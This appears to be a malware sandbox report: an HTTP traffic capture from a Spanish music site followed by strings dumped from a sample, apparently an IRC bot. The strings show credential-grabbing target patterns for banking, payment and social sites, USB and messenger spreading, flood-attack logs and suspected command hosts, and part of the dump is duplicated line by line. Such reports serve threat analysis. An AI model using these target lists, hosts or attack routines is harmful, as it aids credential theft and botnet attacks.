Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-162"
Accept-Ranges: bytes
GET /Imagenes/i_86.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:32 GMT
Content-Type: image/gif
Content-Length: 355
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-163"
Accept-Ranges: bytes
GET / HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
Cookie: __utma=127640345.1684967166.1398081329.1398081329.1398081329.1; __utmb=127640345.1.10.1398081329; __utmc=127640345; __utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 130866
Last-Modified: Mon, 07 Apr 2014 17:00:48 GMT
Connection: keep-alive
ETag: "5342d9c0-1ff32"
Accept-Ranges: bytes
.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">. <head>. <title>Musica Online</title>. <meta name='title' content="Musica Online">. <meta name='description' content="Musica Online tiene un gran repertorio de musica en linea, disfruta de la canciones que mas suenan en la disco, mira los videos y letras de tus canciones favoritas">. <meta name='keywords' content="MUSICA ONLINE,ESCUCHAR MUSICA, MUSICA EN LINEA">. <meta name="robots" content="index, follow"/>. <meta name="author" content="Musica Online"/>. <meta name="copyright" content="Musica Online 2012 Derechos Reservados"/>. <meta http-equiv="Content-Language" content="es"/>. <meta name="revisit" content="1 days"/>. <meta NAME="googlebot" content="index, follow" />. <base href="hXXp://esmusicon.com/" />. <META HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />. <link href="./Estilos/CSS.Sitio.css" rel="stylesheet" type="text/css" />. <link href="./Estilos/CSS.Panel.css" rel="stylesheet" type="text/css" />. <script type="text/javascript" src="Js/Principal.js"></script&g
<<< skipped >>>
GET /pixel.gif?id=5397210&r=0.8804630965534756&u=http://esmusicon.com/Poemas/ HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: px.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT
ETag: 325472601571f31e1bf00674c368d335
Content-Length: 43
Accept-Ranges: bytes
X-Timestamp: 1363188507.50732
Content-Type: image/gif
X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1
Cache-Control: public, max-age=819
Expires: Mon, 21 Apr 2014 12:11:08 GMT
Date: Mon, 21 Apr 2014 11:57:29 GMT
Connection: keep-alive
GET /pixel.gif?id=5397210&r=0.14030898417391835&u=http://esmusicon.com/ HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: px.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT
ETag: 325472601571f31e1bf00674c368d335
Content-Length: 43
Accept-Ranges: bytes
X-Timestamp: 1363188507.50732
Content-Type: image/gif
X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1
Cache-Control: public, max-age=805
Expires: Mon, 21 Apr 2014 12:11:08 GMT
Date: Mon, 21 Apr 2014 11:57:43 GMT
Connection: keep-alive
GET /pixel.gif?id=5397210&r=0.0038873341277975703&u=http://esmusicon.com/ HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: px.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT
ETag: 325472601571f31e1bf00674c368d335
Content-Length: 43
Accept-Ranges: bytes
X-Timestamp: 1363188507.50732
Content-Type: image/gif
X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1
Cache-Control: public, max-age=805
Expires: Mon, 21 Apr 2014 12:11:08 GMT
Date: Mon, 21 Apr 2014 11:57:43 GMT
Connection: keep-alive
GET /pixel.gif?id=5397210&r=0.7235460356268475&u=http://esmusicon.com/Poemas/ HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: px.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT
ETag: 325472601571f31e1bf00674c368d335
Content-Length: 43
Accept-Ranges: bytes
X-Timestamp: 1363188507.50732
Content-Type: image/gif
X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1
Cache-Control: public, max-age=819
Expires: Mon, 21 Apr 2014 12:11:08 GMT
Date: Mon, 21 Apr 2014 11:57:29 GMT
Connection: keep-alive
GET /pixel.gif?id=5397210&r=0.8022853591730279&u=http://esmusicon.com/Poemas/ HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: px.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT
ETag: 325472601571f31e1bf00674c368d335
Content-Length: 43
Accept-Ranges: bytes
X-Timestamp: 1363188507.50732
Content-Type: image/gif
X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1
Cache-Control: public, max-age=819
Expires: Mon, 21 Apr 2014 12:11:08 GMT
Date: Mon, 21 Apr 2014 11:57:29 GMT
Connection: keep-alive
GET /pixel.gif?id=5397210&r=0.8917821187154981&u=http://esmusicon.com/ HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: px.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT
ETag: 325472601571f31e1bf00674c368d335
Content-Length: 43
Accept-Ranges: bytes
X-Timestamp: 1363188507.50732
Content-Type: image/gif
X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1
Cache-Control: public, max-age=805
Expires: Mon, 21 Apr 2014 12:11:08 GMT
Date: Mon, 21 Apr 2014 11:57:43 GMT
Connection: keep-alive
Strings from Dumps
2.exe_1240:
.text
`.data
.rsrc
MSVBVM60.DLL
333333333333330
f00.PR
3333333330
3333330
WebBrowser
SHDocVwCtl.WebBrowser
ieframe.dll
2C:\Windows\SysWOW64\ieframe.oca
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
MsgWaitForMultipleObjects
VBA6.DLL
http:///
@*\AC:\Users\usuario\Desktop\a\nuevato\autoClick.vbp
http://mi.2papa.us
Cargando web:
Web cargada
http://tutecnologia.info/ads.php
mi.2papa.exe
2.exe_1240_rwx_00150000_0004E000:
.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
%s-Mutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
http://%s/%s
http://%s/
POST /23s
{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
shellexecute=
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
%s\%s
%sautorun.tmp
%sautorun.inf
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
mom002.net
mom003.net
mom004.net
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
http://api.wipmania.com/
\\.\pipe\x_ipc
c:\%original file name%.exe
\\.\pipe\e621ca05
%Documents and Settings%\%current user%\Application Data\2.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
8*808;8~8
\\.\pipe
Internet Explorer\iexplore.exe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\Desktop.ini
winlogon.exe
explorer.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Documents and Settings\"%CurrentUserName%"\Application Data\2.exe
2.exe_1240_rwx_00400000_00019000:
.text
`.data
.rsrc
MSVBVM60.DLL
333333333333330
f00.PR
3333333330
3333330
WebBrowser
SHDocVwCtl.WebBrowser
ieframe.dll
2C:\Windows\SysWOW64\ieframe.oca
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
MsgWaitForMultipleObjects
VBA6.DLL
http:///
@*\AC:\Users\usuario\Desktop\a\nuevato\autoClick.vbp
http://mi.2papa.us
Cargando web:
Web cargada
http://tutecnologia.info/ads.php
mi.2papa.exe
csrss.exe_688_rwx_02C60000_0004E000:
.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
%s-Mutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
